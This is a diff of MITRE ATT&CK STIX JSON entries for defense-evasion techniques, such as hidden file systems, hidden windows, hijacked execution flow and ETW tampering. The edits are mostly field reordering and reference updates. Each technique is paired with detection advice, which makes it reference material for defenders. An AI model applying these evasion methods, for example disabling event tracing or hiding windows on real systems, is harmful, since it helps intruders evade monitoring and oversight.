+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "Kaspersky Equation QA",
+ "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.",
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Hidden File System",
+ "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)",
+ "id": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-29T15:12:11.024Z",
+ "created": "2020-06-28T22:55:55.719Z",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Windows Registry"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -11749,6 +12222,22 @@
"created": "2017-12-14T16:46:06.044Z"
},
{
+ "created": "2020-02-26T17:46:13.128Z",
+ "modified": "2020-03-29T22:32:25.985Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
+ "name": "Hidden Files and Directories",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -11771,22 +12260,6 @@
"source_name": "WireLurker"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Hidden Files and Directories",
- "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
- "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-29T22:32:25.985Z",
- "created": "2020-02-26T17:46:13.128Z",
"x_mitre_platforms": [
"Windows",
"macOS",
@@ -11856,19 +12329,19 @@
],
"modified": "2020-03-29T22:36:25.994Z",
"created": "2020-03-13T20:12:40.876Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Authentication logs"
],
- "x_mitre_detection": "This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_permissions_required": [
"root",
"Administrator"
],
- "x_mitre_data_sources": [
- "File monitoring",
- "Authentication logs"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.",
+ "x_mitre_platforms": [
+ "macOS"
]
},
{
@@ -11919,7 +12392,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Hidden Window",
- "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nOn Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [VBScript](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)",
+ "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nOn Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)",
"id": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -11930,41 +12403,61 @@
],
"modified": "2020-03-29T22:49:43.557Z",
"created": "2020-03-13T20:26:49.433Z",
- "x_mitre_platforms": [
- "macOS",
- "Windows"
+ "x_mitre_contributors": [
+ "Travis Smith, Tripwire"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters",
"PowerShell logs"
],
- "x_mitre_detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Travis Smith, Tripwire"
+ "x_mitre_platforms": [
+ "macOS",
+ "Windows"
]
},
{
+ "id": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
+ "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)",
+ "name": "Hide Artifacts",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
"external_id": "T1564",
"url": "https://attack.mitre.org/techniques/T1564"
+ },
+ {
+ "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
+ "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.",
+ "source_name": "Sofacy Komplex Trojan"
+ },
+ {
+ "url": "https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty",
+ "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 8, 2017.",
+ "source_name": "Cybereason OSX Pirrit"
+ },
+ {
+ "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/",
+ "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.",
+ "source_name": "MalwareBytes ADS July 2015"
+ },
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Hide Artifacts",
- "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. \n\nAdversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection. ",
- "id": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -11972,7 +12465,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T22:49:43.726Z",
+ "modified": "2020-07-06T19:03:40.511Z",
"created": "2020-02-26T17:41:25.933Z",
"x_mitre_platforms": [
"Linux",
@@ -11981,7 +12474,7 @@
],
"x_mitre_is_subtechnique": false,
"x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage. ",
+ "x_mitre_detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.",
"x_mitre_data_sources": [
"API monitoring",
"PowerShell logs",
@@ -12009,7 +12502,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Hijack Execution Flow",
- "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as whitelisting or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
+ "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
"id": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -12026,20 +12519,8 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T17:33:44.855Z",
+ "modified": "2020-06-26T16:09:59.324Z",
"created": "2020-03-12T20:38:12.465Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
- ],
- "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.\n\nLook for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nMonitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.\n\nService changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.",
"x_mitre_data_sources": [
"Environment variable",
"Loaded DLLs",
@@ -12047,6 +12528,18 @@
"Process monitoring",
"File monitoring",
"DLL monitoring"
+ ],
+ "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.\n\nLook for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nMonitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.\n\nService changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.",
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -12188,20 +12681,20 @@
],
"modified": "2020-03-30T13:44:04.712Z",
"created": "2017-05-31T21:30:50.958Z",
- "x_mitre_version": "2.0",
- "x_mitre_data_sources": [
- "System calls"
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_detection": "Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)",
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_detection": "Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)",
+ "x_mitre_data_sources": [
+ "System calls"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--62166220-e498-410f-a90a-19d4339d4e99",
@@ -12321,12 +12814,13 @@
],
"modified": "2020-03-24T19:39:50.839Z",
"created": "2020-01-24T15:05:58.384Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Oddvar Moe, @oddvarmoe"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_detection": "Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)",
"x_mitre_data_sources": [
"API monitoring",
"Windows event logs",
@@ -12334,15 +12828,21 @@
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_contributors": [
+ "Oddvar Moe, @oddvarmoe"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "id": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529",
+ "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
+ "name": "Impair Defenses",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -12350,13 +12850,6 @@
"url": "https://attack.mitre.org/techniques/T1562"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Impair Defenses",
- "description": "Adversaries may maliciously modify a victim system in order hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
- "id": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -12364,14 +12857,20 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T22:18:11.350Z",
+ "modified": "2020-07-09T14:43:42.718Z",
"created": "2020-02-21T20:22:13.470Z",
"x_mitre_platforms": [
"Linux",
"Windows",
- "macOS"
+ "macOS",
+ "AWS",
+ "GCP",
+ "Azure"
],
"x_mitre_data_sources": [
+ "GCP audit logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs",
"Anti-virus",
"Services",
"API monitoring",
@@ -12439,26 +12938,29 @@
],
"modified": "2020-03-25T22:47:34.137Z",
"created": "2019-09-04T12:04:03.552Z",
- "x_mitre_platforms": [
- "GCP",
- "Azure",
- "AWS"
- ],
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.",
+ "x_mitre_is_subtechnique": false,
"x_mitre_data_sources": [
"File monitoring",
"Asset management"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_platforms": [
+ "GCP",
+ "Azure",
+ "AWS"
+ ]
},
{
+ "created": "2017-05-31T21:30:47.384Z",
+ "modified": "2020-03-19T19:10:25.404Z",
+ "type": "attack-pattern",
"revoked": true,
"external_references": [
{
@@ -12488,12 +12990,16 @@
}
],
"name": "Indicator Blocking",
- "id": "attack-pattern--6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df",
- "type": "attack-pattern",
- "modified": "2020-03-19T19:10:25.404Z",
- "created": "2017-05-31T21:30:47.384Z"
+ "id": "attack-pattern--6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df"
},
{
+ "id": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da",
+ "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ",
+ "name": "Indicator Blocking",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -12521,13 +13027,6 @@
"description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Indicator Blocking",
- "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ",
- "id": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -12535,10 +13034,12 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-19T19:20:39.087Z",
+ "modified": "2020-07-09T14:43:42.450Z",
"created": "2020-03-19T19:09:30.329Z",
"x_mitre_platforms": [
- "Windows"
+ "Windows",
+ "macOS",
+ "Linux"
],
"x_mitre_contributors": [
"Rob Smith"
@@ -12596,26 +13097,26 @@
],
"modified": "2020-03-29T21:03:09.766Z",
"created": "2020-03-19T21:27:32.820Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Host intrusion prevention systems",
- "Log analysis",
- "Signature-based detection"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
- "x_mitre_detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters",
"Anti-virus",
"Binary file metadata"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.",
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host intrusion prevention systems",
+ "Log analysis",
+ "Signature-based detection"
+ ],
+ "x_mitre_is_subtechnique": true,
